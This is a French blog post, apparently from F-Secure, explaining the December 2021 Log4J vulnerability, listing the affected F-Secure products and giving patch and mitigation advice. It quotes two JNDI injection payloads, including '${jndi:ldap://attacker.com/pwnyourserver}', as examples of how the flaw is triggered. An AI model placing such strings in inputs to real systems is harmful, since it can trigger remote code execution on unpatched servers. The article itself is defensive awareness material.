À propos de ce blog

Thèmes Populaires

La vulnérabilité Log4J fait trembler internet : ce qu’il faut savoir

Amon Francoise Koutoua

13.12.21 3 min de lecture

La vulnérabilité identifiée le vendredi 10 décembre sur Log4J affole les éditeurs de logiciels et les fournisseurs de services du monde entier. Cette faille, qui concerne la méthode de journalisation standard, est déjà prise d’assaut par les hackers du monde entier. Cette vulnérabilité concerne d’innombrables logiciels, depuis Minecraft jusqu’aux plateformes de e-commerce.

 

Il est presque impossible de caractériser, pour l’heure, l’ampleur du risque associé aux applications vulnérables. Si une chaîne de caractères contrôlée par l’utilisateur et ciblant la vulnérabilité est journalisée, l’exploit peut être exécuté à distance. Pour faire simple, le hacker peut utiliser la vulnérabilité en question pour amener le système ciblé à exécuter du code à distance. La nature de ce code malveillant dépend des objectifs de piratage du hacker.

 

Un véritable séisme

Cette crise nous rappelle combien il est difficile de sécuriser les multiples couches de logiciels professionnels. Pour les logiciels hérités, notamment les anciennes versions de Java, les entreprises devront développer leurs propres patchs ou bien elles seront dans l’incapacité de procéder à une correction immédiate de la vulnérabilité. Elles risquent également d’éprouver des difficultés à patcher les fonctions de journalisation de Log4k en temps réel, dans un contexte où le risque est très élevé et où les fonctions de journalisation jouent un rôle critique.

Toutes les mesures correctives recommandées doivent être appliquées « sans attendre », insiste sur son blog la Cybersecurity & Infrastructure Security Agency.

Les particuliers ne peuvent pas faire grand-chose, si ce n’est installer les mises à jour des différents services dès qu’elles sont disponibles. Les entreprises, en revanche, doivent œuvrer sans relâche pour installer tous les patchs nécessaires et sécuriser leurs propres systèmes. Et chaque fois qu’un risque est éliminé, une évaluation doit déterminer si un incident actif est en cours sur les systèmes concernés.

 

Des vulnérabilités presque partout

Log4J est partout : de très nombreuses applications utilisent cette bibliothèque de journalisation. Les hackers peuvent donc rechercher des vulnérabilités presque n’importe où.

« S’il vous plaît, ne changez pas le nom de votre Tesla ou de votre iPhone en ${jndi:ldap://url/a} …. vous risqueriez d’obtenir un résultat assez inattendu », explique Erka Koivunen, Chief Information Security Officer chez F-Secure.

L’utilisation du langage de formatage de Log4J peut déclencher du code dans des applications vulnérables, partout dans le monde. La simple commande “${jndi:ldap://attacker.com/pwnyourserver}” dans un chat Minecraft sur un système non patché a, par exemple, entraîné une véritable crise de sécurité chez Microsoft.

 

Les produits F-Secure sont-ils concernés ?

F-Secure a identifié plusieurs produits affectés par cette vulnérabilité :

F-Secure Policy Manager

F-Secure Policy Manager Proxy

F-Secure Endpoint Proxy

F-Secure Elements Connector

Les versions Windows et Linux de ces produits doivent être considérées comme vulnérables. Si votre produit F-Secure est exposé à internet, vous DEVEZ immédiatement procéder aux vérifications qui s’imposent et appliquer un correctif si nécessaire.

 

Comment patcher votre produit F-Secure ?

F-Secure a créé un patch de sécurité pouvant être installé pour corriger cette vulnérabilité.  Cliquez ici pour consulter les informations les plus récentes.

Plus généralement, quelles mesures devez-vous prendre pour tous les logiciels, quel qu’en soit le fournisseur ?

Restreignez les accès réseau, ou limitez-les aux sites de confiance. Si votre système est incapable de se connecter à internet pour récupérer le code malveillant, le hacker ne pourra pas atteindre ses objectifs.

Vérifiez régulièrement auprès des fournisseurs si des patchs ou d’autres mesures d’atténuation des vulnérabilités sont disponibles.

 

Pensez à utiliser la solution F-Secure Elements Vulnerability Management pour identifier les systèmes vulnérables. F-Secure Elements Endpoint Protection ou F-Secure Business Suite, peuvent aussi vous aider à détecter et à corriger les logiciels vulnérables sur vos systèmes.

 

Amon Francoise Koutoua

13.12.21 3 min de lecture

Article mis en avant

Publications connexes

Newsletter modal

Merci de votre intérêt pour F-Secure. Vous recevrez bientôt un email pour confirmer votre abonnement à la newsletter.

Gated Content modal

Félicitations – Vous pouvez maintenant accéder à votre contenu en cliquant sur le bouton ci-dessous.